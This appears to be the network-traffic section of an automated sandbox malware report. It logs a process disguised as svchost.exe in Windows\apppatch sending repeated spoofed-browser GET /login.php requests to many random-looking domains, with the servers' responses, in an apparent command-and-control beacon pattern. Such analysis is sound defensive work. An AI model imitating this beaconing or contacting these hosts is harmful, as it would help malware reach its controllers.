                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cN04xPru%2Fcs8mY%2B6xIeEfcSHAU8Q1D9sYo4t0GGMnHoVpFugt%2BMwooRHa79c8jiC%2FRv6h8qwRH6N%2FzY%2B0es%2F5qgGqRL0Bw6Fte1%2B3YyKktivEWfHC6Y7sZlSGF%2FNgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0d5659a2429a-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.449733208.100.26.245807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.074459076 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.596396923 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.604758024 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.724021912 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.4553203.64.163.50807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.087038040 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:48.768999100 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 08:58:48.779644012 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:48.971295118 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.45532123.253.46.64807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.089159012 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.600321054 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:44 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.600353956 CEST169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.455322178.162.203.226807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.269939899 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.45532344.221.84.105807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.286434889 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.773612976 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=544a30587fdad065d67fe3028a6f3545|8.46.123.33|1725778725|1725778725|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.45532418.208.156.248807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.297926903 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.791286945 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=4c3b18806614f5c52f005f1d35e37aa2|8.46.123.33|1725778725|1725778725|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.45532544.221.84.105807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.305692911 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.770370007 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f1fee2dad8c9ca8dc6d412a68ea43de1|8.46.123.33|1725778725|1725778725|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.455326199.191.50.83807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.320972919 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.4553273.94.10.34807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.324522972 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.792171955 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=cd4934b955de651c33f6bd9483291e53|8.46.123.33|1725778725|1725778725|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.45532869.162.80.62807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.521517038 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyfyj.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.047544003 CEST362INHTTP/1.1 302 Found
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 11
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            location: http://ww1.lysyfyj.com
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            set-cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761; path=/; domain=.lysyfyj.com; expires=Fri, 26 Sep 2092 10:12:52 GMT; max-age=2147483647; HttpOnly
                                                                                                                                                                                                            Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                                                                                                                                            Data Ascii: Redirecting


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            11192.168.2.455329154.212.231.82807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.545397043 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.617130041 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:46 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
